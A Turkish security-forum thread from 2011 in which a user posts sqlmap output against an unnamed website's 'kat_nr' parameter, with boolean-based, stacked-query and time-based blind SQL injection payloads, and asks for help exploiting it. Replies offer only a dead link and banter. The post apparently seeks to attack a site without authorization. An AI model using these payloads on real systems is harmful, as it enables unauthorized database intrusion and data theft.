Giriş Yap Kayıt ol Online Üyeler Aktif Konular Arama Üyeler Forum Kuralları
Tahribat.Com | MySQL Time-based Blind Injection Yardım
Tahribat.Com Forumları
Web sitesi Güvenliği, DOS - DDOS Saldırıları...
      MySQL Time-based Blind Injection Yardım
Bu Bölümde yeni konu açmak için tıklayın Konuyu cevaplamak için tık...
Konu 14 Haziran 2011 (Sali) 06:55 tarihinde açıldı. Kısayol | Alıntı yap | Özel Mesaj
Allura


Kayıt : 17 Mayis 2009
deist
Erkek Üye
 

Place: GET

Parameter: kat_nr

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: kat_nr=2 AND 5123=5123

 

    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries

    Payload: kat_nr=2; WAITFOR DELAY '0:0:5';--

 

    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: kat_nr=2 AND SLEEP(5)

---

 

[05:19:41] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, ASP, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[05:19:41] [WARNING] HTTP error codes detected during testing:

500 (Internal Server Error) - 29 times

[05:19:41] [INFO] Fetched data logged to text files under 'C:\Python26\output\xx'

 

[*] shutting down at: 05:19:41

--------------------
Merhabalar, sql injection konusunda uzman olan arkadaşlar bu konuda yardımcı olabilirler ise sevinirim.
 Sql injection uygulanması gereken siteye bilindik, sqlmap ile bir tarama çıktısı aldım, genelde integer, integer gibi basit sql açıkları gösterirdi ancak bu kez beni aşan bir yöntem ile karşılaştım.
MySQL time-based blind injection, yane zaman tabanlı blind injection program recommened süre olarak 5000ms önerdi bir kaç program ile denedim ancak başarızı sonuç aldım. Yardımcı olabilecek arkadaşlar konuya bildirirlerse sevinirim.
Teşekkürler.


knowyourMEME22 
14 Haziran 2011 (Sali) 19:09 tarihinde yazıldı. Kısayol | Alıntı yap | Özel Mesaj
Allura


Kayıt : 17 Mayis 2009
deist
Erkek Üye
 

Pump it


knowyourMEME22 
15 Haziran 2011 (Çarsamba) 00:22 tarihinde yazıldı. Kısayol | Alıntı yap | Özel Mesaj
Twitter


Kayıt : 13 Ekim 2007
Finlandiya
Erkek Üye
 

Böyle bir konu açmıştım zamanında hocam umaırm yardımcın olur..

http://www.tahribat.com/Forum-Zaman-Tabanli-Blind-Sql-Injection-137709/


Eski Nick : DersimliHacker Tbt Dersimliler Derneği Başkanı :) 
15 Haziran 2011 (Çarsamba) 13:47 tarihinde yazıldı. Kısayol | Alıntı yap | Özel Mesaj
Allura


Kayıt : 17 Mayis 2009
deist
Erkek Üye
 

Twitter bunu yazdı:
-----------------------------

Böyle bir konu açmıştım zamanında hocam umaırm yardımcın olur..

http://www.tahribat.com/Forum-Zaman-Tabanli-Blind-Sql-Injection-137709/


-----------------------------

 

Böyle Bir Konu Yok, Belkide Hiç Olmadı, Belki Biri Sizi Kekliyo, Belki Adminler Tarafından Silinmiştir, Belki Sıkıntılı İçerikden Dolayı Yayından Kaldırılmıştır, Hepsi Olabilir :) ...(D3)

 

pöfff. :)


knowyourMEME22 
15 Haziran 2011 (Çarsamba) 13:49 tarihinde yazıldı. Kısayol | Alıntı yap | Özel Mesaj
Cosmic
(Harlem)


Kayıt : 14 Haziran 2006
Erkek Üye
 

Allura bunu yazdı:
-----------------------------

Twitter bunu yazdı:
-----------------------------

Böyle bir konu açmıştım zamanında hocam umaırm yardımcın olur..

http://www.tahribat.com/Forum-Zaman-Tabanli-Blind-Sql-Injection-137709/


-----------------------------

 

 

Böyle Bir Konu Yok, Belkide Hiç Olmadı, Belki Biri Sizi Kekliyo, Belki Adminler Tarafından Silinmiştir, Belki Sıkıntılı İçerikden Dolayı Yayından Kaldırılmıştır, Hepsi Olabilir :) ...(D3)

 

pöfff. :)


-----------------------------

login olmayı dene :) www. süz loginsin :)


Bu profil 05-10-2011 tarihinden itibaren 609 tekil hit ve 1437 normal hit almistir. 

[1]


Bu Bölümde yeni konu açmak için dıklayın Konuyu cevaplamak için tık...
Allah'a Havale Et Google Bookmark'a Ekle Yahoo'ya Ekle Stumbleupon'a Ekle Facebook'a Ekle Twitter'a Ekle   Google'da Ara : MySQL time-based blind injection yardım Favorilerime Ekle Yukarı Çık
Konuda 5 Mesaj Var.
Konu 611 Sefer Gösterilmiş.
2001-2012 © Tahribat Group - Her Hakkı Saklıdır. - ● Gizlilik İlkeleri ● Kullanım Koşulları ● İletişim